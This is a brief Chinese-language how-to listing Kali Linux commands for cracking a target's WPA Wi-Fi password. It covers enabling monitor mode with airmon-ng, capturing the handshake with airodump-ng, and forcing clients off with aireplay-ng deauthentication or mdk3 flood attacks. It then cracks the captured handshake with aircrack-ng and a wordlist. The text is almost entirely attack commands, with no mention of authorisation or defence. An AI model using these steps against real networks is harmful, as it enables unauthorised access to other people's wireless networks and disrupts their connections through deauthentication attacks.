- 准备好外置网卡,字典文件。
- 查看无线网卡设备名: root@kali:~# iwconfig
- 启用网卡: root@kali:~# airmon-ng start 网卡名
- 进入监听模式:root@kali:~# airodump-ng 网卡名
- 复制目标BSSID并记住信道。
- 抓握手包:root@kali:~# airodump-ng -w 保存的包名 -c 信道 –bssid 目标的BSSID 网卡名
- 当提示WPA handshake:说明抓到了握手包,如果抓不到,可以新建终端,用如下命令来攻击,强迫重新握手:root@kali:~# aireplay-ng -0 攻击次数 -a ap_mac -c 合法客户端 mac 网卡名 –ignore-negative-one
- 或者使用MDK3工具:root@kali:~# mdk3 网卡名 a -a mac(被pin死的路由器的mac)
- 或者root@kali:~# mdk3 网卡名 d -w #白名单mac地址列表文件 -b #黑名单mac地址列表文件 -s #速率,这个模式下默认无限制 -c [chan,chan,chan,…]#信道,可以多填,如 2,4,5,1
- 用字典来跑密码:root@kali:~# aircrack-ng -w 字典路径 握手包名